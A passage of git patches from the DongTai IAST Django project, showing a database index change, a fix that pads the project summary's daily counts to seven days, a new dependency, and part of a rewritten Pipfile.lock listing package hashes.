name="iast_agent__vul_id_47b430_idx"), ), ] diff --git a/dongtai_common/models/agent_method_pool.py b/dongtai_common/models/agent_method_pool.py index aaaa8d0a5..c0e8a3932 100644 --- a/dongtai_common/models/agent_method_pool.py +++ b/dongtai_common/models/agent_method_pool.py @@ -79,8 +79,7 @@ class Meta: indexes = [ models.Index(fields=["uri_sha1", "http_method", "agent"]), models.Index(fields=["method_pool_id"]), - models.Index(fields=["vul_id"]), - models.Index(fields=["update_time"]), + models.Index(fields=["vul_id", "update_time"]), ] From 0cd968837855e320a2dcaf5bc7385acf599fcb72 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 28 Aug 2023 12:19:33 +0800 Subject: [PATCH 026/114] feat: modify project summary api day_num field --- dongtai_web/views/utils/commonstats.py | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/dongtai_web/views/utils/commonstats.py b/dongtai_web/views/utils/commonstats.py index cc83caad0..dd9511d2d 100644 --- a/dongtai_web/views/utils/commonstats.py +++ b/dongtai_web/views/utils/commonstats.py @@ -95,10 +95,12 @@ def get_summary_by_agent_ids(agent_ids: Iterable): else: day_num_dict[i["day_label"]] = [i] day_num_data = [] + last_timestamp: int = 0 for day_label_i in range(len(daylist)): - _, day_label = daylist[day_label_i] + timestamp, day_label = daylist[day_label_i] if day_label in day_num_dict: # show this day if this day has data + last_timestamp = timestamp obj = get_empty_day_num_num(day_label) count = 0 for i in day_num_dict[day_label]: @@ -108,7 +110,11 @@ def get_summary_by_agent_ids(agent_ids: Iterable): day_num_data.append(obj) elif day_label_i + 1 < len(daylist) and daylist[day_label_i + 1][1] in day_num_dict: # show this day if this yesterday has data + last_timestamp = timestamp day_num_data.append(get_empty_day_num_num(day_label)) + for i in range(1, 8 - len(day_num_data) + 1): + day = time.localtime(last_timestamp + 86400 * i) + day_num_data.append(get_empty_day_num_num(str(day.tm_mon) + "-" + str(day.tm_mday))) data["day_num"] = day_num_data levelInfo = IastVulLevel.objects.all() levelIdArr = {} @@ -196,10 +202,12 @@ def get_summary_by_project(project_id: int, project_version_id: int): else: day_num_dict[i["day_label"]] = [i] day_num_data = [] + last_timestamp: int = 0 for day_label_i in range(len(daylist)): - _, day_label = daylist[day_label_i] + timestamp, day_label = daylist[day_label_i] if day_label in day_num_dict: # show this day if this day has data + last_timestamp = timestamp obj = get_empty_day_num_num(day_label) count = 0 for i in day_num_dict[day_label]: @@ -209,7 +217,11 @@ def get_summary_by_project(project_id: int, project_version_id: int): day_num_data.append(obj) elif day_label_i + 1 < len(daylist) and daylist[day_label_i + 1][1] in day_num_dict: # show this day if this yesterday has data + last_timestamp = timestamp day_num_data.append(get_empty_day_num_num(day_label)) + for i in range(1, 8 - len(day_num_data) + 1): + day = time.localtime(last_timestamp + 86400 * i) + day_num_data.append(get_empty_day_num_num(str(day.tm_mon) + "-" + str(day.tm_mday))) data["day_num"] = day_num_data levelInfo = IastVulLevel.objects.all() levelIdArr = {} From 5d210e8f425c63b10032dd9e705619f9beef5173 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 28 Aug 2023 14:44:47 +0800 Subject: [PATCH 027/114] feat: method pool save --- Pipfile | 1 + Pipfile.lock | 4184 ++++++++--------- .../migrations/0014_auto_20230828_1132.py | 2 + requirements.txt | 230 +- 4 files changed, 2193 insertions(+), 2224 deletions(-) diff --git a/Pipfile b/Pipfile index ed65d3a55..532a4e42b 100644 --- a/Pipfile +++ b/Pipfile @@ -89,6 +89,7 @@ networkit = "*" flower = "~=2.0.0" django-health-check = "==3.17.0" django-prometheus = "==2.3.1" +django-add-default-value = "==0.10.0" [dev-packages] diff --git a/Pipfile.lock b/Pipfile.lock index 9b2dd31f4..05da131cf 100644 --- a/Pipfile.lock +++ b/Pipfile.lock @@ -1,2110 +1,2078 @@ { - "_meta": { - "hash": { - "sha256": "ea26523ac717832c23ff3c25488c707c515b73495a620c03ffd5ee7d2e2b1205" - }, - "pipfile-spec": 6, - "requires": { - "python_version": "3.10" - }, - "sources": [ - { - "name": "pypi", - "url": "https://pypi.org/simple", - "verify_ssl": true - } - ] - }, - "default": { - "aliyun-python-sdk-core": { - "hashes": [ - "sha256:20bd54984fa316da700c7f355a51ab0b816690e2a0fcefb7b5ef013fed0da928" - ], - "version": "==2.13.36" - }, - "aliyun-python-sdk-core-v3": { - "hashes": [ - "sha256:d7df820fa31193be3f0a3a991c4126051900b3d2f09c0fc5ff7af43cf36ac245" - ], - "version": "==2.13.33" - }, - "aliyun-python-sdk-kms": { - "hashes": [ - "sha256:9bc39c693ba83944f5dfb871b118a2925eb8a5ee214dfcce61ee2ea3b6317ef1", - "sha256:a372737715682014bace68bd40fe83332f4fd925009a3eb110d41bc66f270e7a" - ], - "version": "==2.16.1" - }, - "amqp": { - "hashes": [ - "sha256:2c1b13fecc0893e946c65cbd5f36427861cffa4ea2201d8f6fca22e2a373b5e2", - "sha256:6f0956d2c23d8fa6e7691934d8c3930eadb44972cbbd1a7ae3a520f735d43359" - ], - "markers": "python_version >= '3.6'", - "version": "==5.1.1" - }, - "annotated-types": { - "hashes": [ - "sha256:47cdc3490d9ac1506ce92c7aaa76c579dc3509ff11e098fc867e5130ab7be802", - "sha256:58da39888f92c276ad970249761ebea80ba544b77acddaa1a4d6cf78287d45fd" - ], - "markers": "python_version >= '3.7'", - "version": "==0.5.0" - }, - "asgiref": { - "hashes": [ - "sha256:89b2ef2247e3b562a16eef663bc0e2e703ec6468e2fa8a5cd61cd449786d4f6e", - "sha256:9e0ce3aa93a819ba5b45120216b23878cf6e8525eb3848653452b4192b92afed" - ], - "index": "pypi", - "version": "==3.7.2" - }, - "async-timeout": { - "hashes": [ - "sha256:4640d96be84d82d02ed59ea2b7105a0f7b33abe8703703cd0ab0bf87c427522f", - "sha256:7405140ff1230c310e51dc27b3145b9092d659ce68ff733fb0cefe3ee42be028" - ], - "markers": "python_version >= '3.7'", - "version": "==4.0.3" - }, - "attrs": { - "hashes": [ - "sha256:1f28b4522cdc2fb4256ac1a020c78acf9cba2c6b461ccd2c126f3aa8e8335d04", - "sha256:6279836d581513a26f1bf235f9acd333bc9115683f14f7e8fae46c98fc50e015" - ], - "markers": "python_version >= '3.7'", - "version": "==23.1.0" - }, - "autopep8": { - "hashes": [ - "sha256:86e9303b5e5c8160872b2f5ef611161b2893e9bfe8ccc7e2f76385947d57a2f1", - "sha256:f9849cdd62108cb739dbcdbfb7fdcc9a30d1b63c4cc3e1c1f893b5360941b61c" - ], - "markers": "python_version >= '3.6'", - "version": "==2.0.2" - }, - "billiard": { - "hashes": [ - "sha256:0f50d6be051c6b2b75bfbc8bfd85af195c5739c281d3f5b86a5640c65563614a", - "sha256:1ad2eeae8e28053d729ba3373d34d9d6e210f6e4d8bf0a9c64f92bd053f1edf5" - ], - "markers": "python_version >= '3.7'", - "version": "==4.1.0" - }, - "boto3": { - "hashes": [ - "sha256:34ab44146a2c4e7f4e72737f4b27e6eb5e0a7855c2f4599e3d9199b6a0a2d575", - "sha256:a50b4323f9579cfe22fcf5531fbd40b567d4d74c1adce06aeb5c95fce2a6fb40" - ], - "index": "pypi", - "version": "==1.24.59" - }, - "boto3-stubs": { - "hashes": [ - "sha256:b140f56315cd99c659a2cbae32dc4ae1ee44073b4250e1ad391d03ecf4b5eb40", - "sha256:bcef1fcbd758de6078e75b036d3632dd95eaef00311e6688554b5b883a194563" - ], - "index": "pypi", - "version": "==1.28.2" - }, - "botocore": { - "hashes": [ - "sha256:1d6e97bd8653f732c7078b34aa2bb438e750898957e5a0a74b6c72918bc1d0f7", - "sha256:c8fac203a391cc2e4b682877bfce70e723e33c529b35b399a1d574605fbeb1af" - ], - "index": "pypi", - "version": "==1.27.91" - }, - "botocore-stubs": { - "hashes": [ - "sha256:020de306ca1e18263e5a73b9142ec9901080f36d7c302ca53850483955e894ad", - "sha256:e9b23f54137bffbe7dcc08d9ca072172368cf92723aee34ec1de6e665f767c60" - ], - "index": "pypi", - "version": "==1.29.165" - }, - "celery": { - "hashes": [ - "sha256:0f104775617974c9a108857c883dd5a5b0a9058278bccf1881ff5d3317fa15ab", - "sha256:3afa81e7c6393097a4079badc11117ac20a1bf145c92ae5f1cc3ed24c2b1f165" - ], - "index": "pypi", - "version": "==5.3.0rc1" - }, - "celery-singleton": { - "hashes": [ - "sha256:260ce4978e631f8682ea0ccb03d7f3b87d42bc20e04e9bd46ddb78a2f8035d1e", - "sha256:76b30a1bbe31d42030924b3eecfcaae2ab3ab99bf43e607cd46437f012434420" - ], - "index": "pypi", - "version": "==0.3.1" - }, - "certifi": { - "hashes": [ - "sha256:539cc1d13202e33ca466e88b2807e29f4c13049d6d87031a3c110744495cb082", - "sha256:92d6037539857d8206b8f6ae472e8b77db8058fec5937a1ef3f54304089edbb9" - ], - "index": "pypi", - "version": "==2023.7.22" - }, - "cffi": { - "hashes": [ - "sha256:00a9ed42e88df81ffae7a8ab6d9356b371399b91dbdf0c3cb1e84c03a13aceb5", - "sha256:03425bdae262c76aad70202debd780501fabeaca237cdfddc008987c0e0f59ef", - "sha256:04ed324bda3cda42b9b695d51bb7d54b680b9719cfab04227cdd1e04e5de3104", - "sha256:0e2642fe3142e4cc4af0799748233ad6da94c62a8bec3a6648bf8ee68b1c7426", - "sha256:173379135477dc8cac4bc58f45db08ab45d228b3363adb7af79436135d028405", - "sha256:198caafb44239b60e252492445da556afafc7d1e3ab7a1fb3f0584ef6d742375", - "sha256:1e74c6b51a9ed6589199c787bf5f9875612ca4a8a0785fb2d4a84429badaf22a", - "sha256:2012c72d854c2d03e45d06ae57f40d78e5770d252f195b93f581acf3ba44496e", - "sha256:21157295583fe8943475029ed5abdcf71eb3911894724e360acff1d61c1d54bc", - "sha256:2470043b93ff09bf8fb1d46d1cb756ce6132c54826661a32d4e4d132e1977adf", - "sha256:285d29981935eb726a4399badae8f0ffdff4f5050eaa6d0cfc3f64b857b77185", - "sha256:30d78fbc8ebf9c92c9b7823ee18eb92f2e6ef79b45ac84db507f52fbe3ec4497", - "sha256:320dab6e7cb2eacdf0e658569d2575c4dad258c0fcc794f46215e1e39f90f2c3", - "sha256:33ab79603146aace82c2427da5ca6e58f2b3f2fb5da893ceac0c42218a40be35", - "sha256:3548db281cd7d2561c9ad9984681c95f7b0e38881201e157833a2342c30d5e8c", - "sha256:3799aecf2e17cf585d977b780ce79ff0dc9b78d799fc694221ce814c2c19db83", - "sha256:39d39875251ca8f612b6f33e6b1195af86d1b3e60086068be9cc053aa4376e21", - "sha256:3b926aa83d1edb5aa5b427b4053dc420ec295a08e40911296b9eb1b6170f6cca", - "sha256:3bcde07039e586f91b45c88f8583ea7cf7a0770df3a1649627bf598332cb6984", - "sha256:3d08afd128ddaa624a48cf2b859afef385b720bb4b43df214f85616922e6a5ac", - "sha256:3eb6971dcff08619f8d91607cfc726518b6fa2a9eba42856be181c6d0d9515fd", - "sha256:40f4774f5a9d4f5e344f31a32b5096977b5d48560c5592e2f3d2c4374bd543ee", - "sha256:4289fc34b2f5316fbb762d75362931e351941fa95fa18789191b33fc4cf9504a", - "sha256:470c103ae716238bbe698d67ad020e1db9d9dba34fa5a899b5e21577e6d52ed2", - "sha256:4f2c9f67e9821cad2e5f480bc8d83b8742896f1242dba247911072d4fa94c192", - "sha256:50a74364d85fd319352182ef59c5c790484a336f6db772c1a9231f1c3ed0cbd7", - "sha256:54a2db7b78338edd780e7ef7f9f6c442500fb0d41a5a4ea24fff1c929d5af585", - "sha256:5635bd9cb9731e6d4a1132a498dd34f764034a8ce60cef4f5319c0541159392f", - "sha256:59c0b02d0a6c384d453fece7566d1c7e6b7bae4fc5874ef2ef46d56776d61c9e", - "sha256:5d598b938678ebf3c67377cdd45e09d431369c3b1a5b331058c338e201f12b27", - "sha256:5df2768244d19ab7f60546d0c7c63ce1581f7af8b5de3eb3004b9b6fc8a9f84b", - "sha256:5ef34d190326c3b1f822a5b7a45f6c4535e2f47ed06fec77d3d799c450b2651e", - "sha256:6975a3fac6bc83c4a65c9f9fcab9e47019a11d3d2cf7f3c0d03431bf145a941e", - "sha256:6c9a799e985904922a4d207a94eae35c78ebae90e128f0c4e521ce339396be9d", - "sha256:70df4e3b545a17496c9b3f41f5115e69a4f2e77e94e1d2a8e1070bc0c38c8a3c", - "sha256:7473e861101c9e72452f9bf8acb984947aa1661a7704553a9f6e4baa5ba64415", - "sha256:8102eaf27e1e448db915d08afa8b41d6c7ca7a04b7d73af6514df10a3e74bd82", - "sha256:87c450779d0914f2861b8526e035c5e6da0a3199d8f1add1a665e1cbc6fc6d02", - "sha256:8b7ee99e510d7b66cdb6c593f21c043c248537a32e0bedf02e01e9553a172314", - "sha256:91fc98adde3d7881af9b59ed0294046f3806221863722ba7d8d120c575314325", - "sha256:94411f22c3985acaec6f83c6df553f2dbe17b698cc7f8ae751ff2237d96b9e3c", - "sha256:98d85c6a2bef81588d9227dde12db8a7f47f639f4a17c9ae08e773aa9c697bf3", - "sha256:9ad5db27f9cabae298d151c85cf2bad1d359a1b9c686a275df03385758e2f914", - "sha256:a0b71b1b8fbf2b96e41c4d990244165e2c9be83d54962a9a1d118fd8657d2045", - "sha256:a0f100c8912c114ff53e1202d0078b425bee3649ae34d7b070e9697f93c5d52d", - "sha256:a591fe9e525846e4d154205572a029f653ada1a78b93697f3b5a8f1f2bc055b9", - "sha256:a5c84c68147988265e60416b57fc83425a78058853509c1b0629c180094904a5", - "sha256:a66d3508133af6e8548451b25058d5812812ec3798c886bf38ed24a98216fab2", - "sha256:a8c4917bd7ad33e8eb21e9a5bbba979b49d9a97acb3a803092cbc1133e20343c", - "sha256:b3bbeb01c2b273cca1e1e0c5df57f12dce9a4dd331b4fa1635b8bec26350bde3", - "sha256:cba9d6b9a7d64d4bd46167096fc9d2f835e25d7e4c121fb2ddfc6528fb0413b2", - "sha256:cc4d65aeeaa04136a12677d3dd0b1c0c94dc43abac5860ab33cceb42b801c1e8", - "sha256:ce4bcc037df4fc5e3d184794f27bdaab018943698f4ca31630bc7f84a7b69c6d", - "sha256:cec7d9412a9102bdc577382c3929b337320c4c4c4849f2c5cdd14d7368c5562d", - "sha256:d400bfb9a37b1351253cb402671cea7e89bdecc294e8016a707f6d1d8ac934f9", - "sha256:d61f4695e6c866a23a21acab0509af1cdfd2c013cf256bbf5b6b5e2695827162", - "sha256:db0fbb9c62743ce59a9ff687eb5f4afbe77e5e8403d6697f7446e5f609976f76", - "sha256:dd86c085fae2efd48ac91dd7ccffcfc0571387fe1193d33b6394db7ef31fe2a4", - "sha256:e00b098126fd45523dd056d2efba6c5a63b71ffe9f2bbe1a4fe1716e1d0c331e", - "sha256:e229a521186c75c8ad9490854fd8bbdd9a0c9aa3a524326b55be83b54d4e0ad9", - "sha256:e263d77ee3dd201c3a142934a086a4450861778baaeeb45db4591ef65550b0a6", - "sha256:ed9cb427ba5504c1dc15ede7d516b84757c3e3d7868ccc85121d9310d27eed0b", - "sha256:fa6693661a4c91757f4412306191b6dc88c1703f780c8234035eac011922bc01", - "sha256:fcd131dd944808b5bdb38e6f5b53013c5aa4f334c5cad0c72742f6eba4b73db0" - ], - "index": "pypi", - "version": "==1.15.1" - }, - "chardet": { - "hashes": [ - "sha256:0d62712b956bc154f85fb0a266e2a3c5913c2967e00348701b32411d6def31e5", - "sha256:362777fb014af596ad31334fde1e8c327dfdb076e1960d1694662d46a6917ab9" - ], - "index": "pypi", - "version": "==5.1.0" - }, - "charset-normalizer": { - "hashes": [ - "sha256:04e57ab9fbf9607b77f7d057974694b4f6b142da9ed4a199859d9d4d5c63fe96", - "sha256:09393e1b2a9461950b1c9a45d5fd251dc7c6f228acab64da1c9c0165d9c7765c", - "sha256:0b87549028f680ca955556e3bd57013ab47474c3124dc069faa0b6545b6c9710", - "sha256:1000fba1057b92a65daec275aec30586c3de2401ccdcd41f8a5c1e2c87078706", - "sha256:1249cbbf3d3b04902ff081ffbb33ce3377fa6e4c7356f759f3cd076cc138d020", - "sha256:1920d4ff15ce893210c1f0c0e9d19bfbecb7983c76b33f046c13a8ffbd570252", - "sha256:193cbc708ea3aca45e7221ae58f0fd63f933753a9bfb498a3b474878f12caaad", - "sha256:1a100c6d595a7f316f1b6f01d20815d916e75ff98c27a01ae817439ea7726329", - "sha256:1f30b48dd7fa1474554b0b0f3fdfdd4c13b5c737a3c6284d3cdc424ec0ffff3a", - "sha256:203f0c8871d5a7987be20c72442488a0b8cfd0f43b7973771640fc593f56321f", - "sha256:246de67b99b6851627d945db38147d1b209a899311b1305dd84916f2b88526c6", - "sha256:2dee8e57f052ef5353cf608e0b4c871aee320dd1b87d351c28764fc0ca55f9f4", - "sha256:2efb1bd13885392adfda4614c33d3b68dee4921fd0ac1d3988f8cbb7d589e72a", - "sha256:2f4ac36d8e2b4cc1aa71df3dd84ff8efbe3bfb97ac41242fbcfc053c67434f46", - "sha256:3170c9399da12c9dc66366e9d14da8bf7147e1e9d9ea566067bbce7bb74bd9c2", - "sha256:3b1613dd5aee995ec6d4c69f00378bbd07614702a315a2cf6c1d21461fe17c23", - "sha256:3bb3d25a8e6c0aedd251753a79ae98a093c7e7b471faa3aa9a93a81431987ace", - "sha256:3bb7fda7260735efe66d5107fb7e6af6a7c04c7fce9b2514e04b7a74b06bf5dd", - "sha256:41b25eaa7d15909cf3ac4c96088c1f266a9a93ec44f87f1d13d4a0e86c81b982", - "sha256:45de3f87179c1823e6d9e32156fb14c1927fcc9aba21433f088fdfb555b77c10", - "sha256:46fb8c61d794b78ec7134a715a3e564aafc8f6b5e338417cb19fe9f57a5a9bf2", - "sha256:48021783bdf96e3d6de03a6e39a1171ed5bd7e8bb93fc84cc649d11490f87cea", - "sha256:4957669ef390f0e6719db3613ab3a7631e68424604a7b448f079bee145da6e09", - "sha256:5e86d77b090dbddbe78867a0275cb4df08ea195e660f1f7f13435a4649e954e5", - "sha256:6339d047dab2780cc6220f46306628e04d9750f02f983ddb37439ca47ced7149", - "sha256:681eb3d7e02e3c3655d1b16059fbfb605ac464c834a0c629048a30fad2b27489", - "sha256:6c409c0deba34f147f77efaa67b8e4bb83d2f11c8806405f76397ae5b8c0d1c9", - "sha256:7095f6fbfaa55defb6b733cfeb14efaae7a29f0b59d8cf213be4e7ca0b857b80", - "sha256:70c610f6cbe4b9fce272c407dd9d07e33e6bf7b4aa1b7ffb6f6ded8e634e3592", - "sha256:72814c01533f51d68702802d74f77ea026b5ec52793c791e2da806a3844a46c3", - "sha256:7a4826ad2bd6b07ca615c74ab91f32f6c96d08f6fcc3902ceeedaec8cdc3bcd6", - "sha256:7c70087bfee18a42b4040bb9ec1ca15a08242cf5867c58726530bdf3945672ed", - "sha256:855eafa5d5a2034b4621c74925d89c5efef61418570e5ef9b37717d9c796419c", - "sha256:8700f06d0ce6f128de3ccdbc1acaea1ee264d2caa9ca05daaf492fde7c2a7200", - "sha256:89f1b185a01fe560bc8ae5f619e924407efca2191b56ce749ec84982fc59a32a", - "sha256:8b2c760cfc7042b27ebdb4a43a4453bd829a5742503599144d54a032c5dc7e9e", - "sha256:8c2f5e83493748286002f9369f3e6607c565a6a90425a3a1fef5ae32a36d749d", - "sha256:8e098148dd37b4ce3baca71fb394c81dc5d9c7728c95df695d2dca218edf40e6", - "sha256:94aea8eff76ee6d1cdacb07dd2123a68283cb5569e0250feab1240058f53b623", - "sha256:95eb302ff792e12aba9a8b8f8474ab229a83c103d74a750ec0bd1c1eea32e669", - "sha256:9bd9b3b31adcb054116447ea22caa61a285d92e94d710aa5ec97992ff5eb7cf3", - "sha256:9e608aafdb55eb9f255034709e20d5a83b6d60c054df0802fa9c9883d0a937aa", - "sha256:a103b3a7069b62f5d4890ae1b8f0597618f628b286b03d4bc9195230b154bfa9", - "sha256:a386ebe437176aab38c041de1260cd3ea459c6ce5263594399880bbc398225b2", - "sha256:a38856a971c602f98472050165cea2cdc97709240373041b69030be15047691f", - "sha256:a401b4598e5d3f4a9a811f3daf42ee2291790c7f9d74b18d75d6e21dda98a1a1", - "sha256:a7647ebdfb9682b7bb97e2a5e7cb6ae735b1c25008a70b906aecca294ee96cf4", - "sha256:aaf63899c94de41fe3cf934601b0f7ccb6b428c6e4eeb80da72c58eab077b19a", - "sha256:b0dac0ff919ba34d4df1b6131f59ce95b08b9065233446be7e459f95554c0dc8", - "sha256:baacc6aee0b2ef6f3d308e197b5d7a81c0e70b06beae1f1fcacffdbd124fe0e3", - "sha256:bf420121d4c8dce6b889f0e8e4ec0ca34b7f40186203f06a946fa0276ba54029", - "sha256:c04a46716adde8d927adb9457bbe39cf473e1e2c2f5d0a16ceb837e5d841ad4f", - "sha256:c0b21078a4b56965e2b12f247467b234734491897e99c1d51cee628da9786959", - "sha256:c1c76a1743432b4b60ab3358c937a3fe1341c828ae6194108a94c69028247f22", - "sha256:c4983bf937209c57240cff65906b18bb35e64ae872da6a0db937d7b4af845dd7", - "sha256:c4fb39a81950ec280984b3a44f5bd12819953dc5fa3a7e6fa7a80db5ee853952", - "sha256:c57921cda3a80d0f2b8aec7e25c8aa14479ea92b5b51b6876d975d925a2ea346", - "sha256:c8063cf17b19661471ecbdb3df1c84f24ad2e389e326ccaf89e3fb2484d8dd7e", - "sha256:ccd16eb18a849fd8dcb23e23380e2f0a354e8daa0c984b8a732d9cfaba3a776d", - "sha256:cd6dbe0238f7743d0efe563ab46294f54f9bc8f4b9bcf57c3c666cc5bc9d1299", - "sha256:d62e51710986674142526ab9f78663ca2b0726066ae26b78b22e0f5e571238dd", - "sha256:db901e2ac34c931d73054d9797383d0f8009991e723dab15109740a63e7f902a", - "sha256:e03b8895a6990c9ab2cdcd0f2fe44088ca1c65ae592b8f795c3294af00a461c3", - "sha256:e1c8a2f4c69e08e89632defbfabec2feb8a8d99edc9f89ce33c4b9e36ab63037", - "sha256:e4b749b9cc6ee664a3300bb3a273c1ca8068c46be705b6c31cf5d276f8628a94", - "sha256:e6a5bf2cba5ae1bb80b154ed68a3cfa2fa00fde979a7f50d6598d3e17d9ac20c", - "sha256:e857a2232ba53ae940d3456f7533ce6ca98b81917d47adc3c7fd55dad8fab858", - "sha256:ee4006268ed33370957f55bf2e6f4d263eaf4dc3cfc473d1d90baff6ed36ce4a", - "sha256:eef9df1eefada2c09a5e7a40991b9fc6ac6ef20b1372abd48d2794a316dc0449", - "sha256:f058f6963fd82eb143c692cecdc89e075fa0828db2e5b291070485390b2f1c9c", - "sha256:f25c229a6ba38a35ae6e25ca1264621cc25d4d38dca2942a7fce0b67a4efe918", - "sha256:f2a1d0fd4242bd8643ce6f98927cf9c04540af6efa92323e9d3124f57727bfc1", - "sha256:f7560358a6811e52e9c4d142d497f1a6e10103d3a6881f18d04dbce3729c0e2c", - "sha256:f779d3ad205f108d14e99bb3859aa7dd8e9c68874617c72354d7ecaec2a054ac", - "sha256:f87f746ee241d30d6ed93969de31e5ffd09a2961a051e60ae6bddde9ec3583aa" - ], - "markers": "python_version >= '3.7'", - "version": "==3.2.0" - }, - "click": { - "hashes": [ - "sha256:48ee849951919527a045bfe3bf7baa8a959c423134e1a5b98c05c20ba75a1cbd", - "sha256:fa244bb30b3b5ee2cae3da8f55c9e5e0c0e86093306301fb418eb9dc40fbded5" - ], - "markers": "python_version >= '3.7'", - "version": "==8.1.6" - }, - "click-didyoumean": { - "hashes": [ - "sha256:a0713dc7a1de3f06bc0df5a9567ad19ead2d3d5689b434768a6145bff77c0667", - "sha256:f184f0d851d96b6d29297354ed981b7dd71df7ff500d82fa6d11f0856bee8035" - ], - "markers": "python_version < '4.0' and python_full_version >= '3.6.2'", - "version": "==0.3.0" - }, - "click-plugins": { - "hashes": [ - "sha256:46ab999744a9d831159c3411bb0c79346d94a444df9a3a3742e9ed63645f264b", - "sha256:5d262006d3222f5057fd81e1623d4443e41dcda5dc815c06b442aa3c02889fc8" - ], - "version": "==1.1.1" - }, - "click-repl": { - "hashes": [ - "sha256:17849c23dba3d667247dc4defe1757fff98694e90fe37474f3feebb69ced26a9", - "sha256:fb7e06deb8da8de86180a33a9da97ac316751c094c6899382da7feeeeb51b812" - ], - "markers": "python_version >= '3.6'", - "version": "==0.3.0" - }, - "crcmod": { - "hashes": [ - "sha256:50586ab48981f11e5b117523d97bb70864a2a1af246cf6e4f5c4a21ef4611cd1", - "sha256:69a2e5c6c36d0f096a7beb4cd34e5f882ec5fd232efb710cdb85d4ff196bd52e", - "sha256:737fb308fa2ce9aed2e29075f0d5980d4a89bfbec48a368c607c5c63b3efb90e", - "sha256:dc7051a0db5f2bd48665a990d3ec1cc305a466a77358ca4492826f41f283601e" - ], - "version": "==1.7" - }, - "cryptography": { - "hashes": [ - "sha256:0d09fb5356f975974dbcb595ad2d178305e5050656affb7890a1583f5e02a306", - "sha256:23c2d778cf829f7d0ae180600b17e9fceea3c2ef8b31a99e3c694cbbf3a24b84", - "sha256:3fb248989b6363906827284cd20cca63bb1a757e0a2864d4c1682a985e3dca47", - "sha256:41d7aa7cdfded09b3d73a47f429c298e80796c8e825ddfadc84c8a7f12df212d", - "sha256:42cb413e01a5d36da9929baa9d70ca90d90b969269e5a12d39c1e0d475010116", - "sha256:4c2f0d35703d61002a2bbdcf15548ebb701cfdd83cdc12471d2bae80878a4207", - "sha256:4fd871184321100fb400d759ad0cddddf284c4b696568204d281c902fc7b0d81", - "sha256:5259cb659aa43005eb55a0e4ff2c825ca111a0da1814202c64d28a985d33b087", - "sha256:57a51b89f954f216a81c9d057bf1a24e2f36e764a1ca9a501a6964eb4a6800dd", - "sha256:652627a055cb52a84f8c448185922241dd5217443ca194d5739b44612c5e6507", - "sha256:67e120e9a577c64fe1f611e53b30b3e69744e5910ff3b6e97e935aeb96005858", - "sha256:6af1c6387c531cd364b72c28daa29232162010d952ceb7e5ca8e2827526aceae", - "sha256:6d192741113ef5e30d89dcb5b956ef4e1578f304708701b8b73d38e3e1461f34", - "sha256:7efe8041897fe7a50863e51b77789b657a133c75c3b094e51b5e4b5cec7bf906", - "sha256:84537453d57f55a50a5b6835622ee405816999a7113267739a1b4581f83535bd", - "sha256:8f09daa483aedea50d249ef98ed500569841d6498aa9c9f4b0531b9964658922", - "sha256:95dd7f261bb76948b52a5330ba5202b91a26fbac13ad0e9fc8a3ac04752058c7", - "sha256:a74fbcdb2a0d46fe00504f571a2a540532f4c188e6ccf26f1f178480117b33c4", - "sha256:a983e441a00a9d57a4d7c91b3116a37ae602907a7618b882c8013b5762e80574", - "sha256:ab8de0d091acbf778f74286f4989cf3d1528336af1b59f3e5d2ebca8b5fe49e1", - "sha256:aeb57c421b34af8f9fe830e1955bf493a86a7996cc1338fe41b30047d16e962c", - "sha256:ce785cf81a7bdade534297ef9e490ddff800d956625020ab2ec2780a556c313e", - "sha256:d0d651aa754ef58d75cec6edfbd21259d93810b73f6ec246436a21b7841908de" - ], - "index": "pypi", - "version": "==41.0.3" - }, - "dataclasses-json": { - "hashes": [ - "sha256:1280542631df1c375b7bc92e5b86d39e06c44760d7e3571a537b3b8acabf2f0c", - "sha256:e9ac87b73edc0141aafbce02b44e93553c3123ad574958f0fe52a534b6707e8e" - ], - "index": "pypi", - "version": "==0.5.9" - }, - "ddt": { - "hashes": [ - "sha256:e3c93b961a108b4f4d5a6c7f2263513d928baf3bb5b32af8e1c804bfb041141d", - "sha256:f71b348731b8c78c3100bffbd951a769fbd439088d1fdbb3841eee019af80acd" - ], - "index": "pypi", - "version": "==1.6.0" - }, - "defusedxml": { - "hashes": [ - "sha256:1bb3032db185915b62d7c6209c5a8792be6a32ab2fedacc84e01b52c51aa3e69", - "sha256:a352e7e428770286cc899e2542b6cdaedb2b4953ff269a210103ec58f6198a61" - ], - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", - "version": "==0.7.1" - }, - "diff-match-patch": { - "hashes": [ - "sha256:953019cdb9c9d2c9e47b5b12bcff3cf4746fc4598eb406076fa1fc27e6a1f15c", - "sha256:dce43505fb7b1b317de7195579388df0746d90db07015ed47a85e5e44930ef93" - ], - "markers": "python_version >= '3.7'", - "version": "==20230430" - }, - "django": { - "hashes": [ - "sha256:a477ab326ae7d8807dc25c186b951ab8c7648a3a23f9497763c37307a2b5ef87", - "sha256:dec2a116787b8e14962014bf78e120bba454135108e1af9e9b91ade7b2964c40" - ], - "index": "pypi", - "version": "==3.2.20" - }, - "django-celery-beat": { - "hashes": [ - "sha256:b8a13afb15e7c53fc04f4f847ac71a6d32088959aba701eb7c4a59f0c28ba543", - "sha256:c4c72a9579f20eff4c4ccf1b58ebdca5ef940f4210065057db1754ea5f8dffdc" - ], - "index": "pypi", - "version": "==2.2.0" - }, - "django-cors-headers": { - "hashes": [ - "sha256:9ada212b0e2efd4a5e339360ffc869cb21ac5605e810afe69f7308e577ea5bde", - "sha256:f9749c6410fe738278bc2b6ef17f05195bc7b251693c035752d8257026af024f" - ], - "index": "pypi", - "version": "==4.2.0" - }, - "django-cprofile-middleware": { - "hashes": [ - "sha256:b942185a38f3b582935a55c768f126ce9a6f0cefceee3b5d19e6b307ad129889" - ], - "index": "pypi", - "version": "==1.0.5" - }, - "django-elasticsearch-dsl": { - "hashes": [ - "sha256:3c58a254a6318b169eb904d41d802924b99ea8e53ddc2c596ebba90506cf47fa", - "sha256:811d3909b3387fd55c19d9bbcf0e9a9b234f085df3f8422d59e7519a5f733e0e" - ], - "index": "pypi", - "version": "==7.2.2" - }, - "django-filter": { - "hashes": [ - "sha256:2fe15f78108475eda525692813205fa6f9e8c1caf1ae65daa5862d403c6dbf00", - "sha256:d12d8e0fc6d3eb26641e553e5d53b191eb8cec611427d4bdce0becb1f7c172b5" - ], - "index": "pypi", - "version": "==23.2" - }, - "django-health-check": { - "hashes": [ - 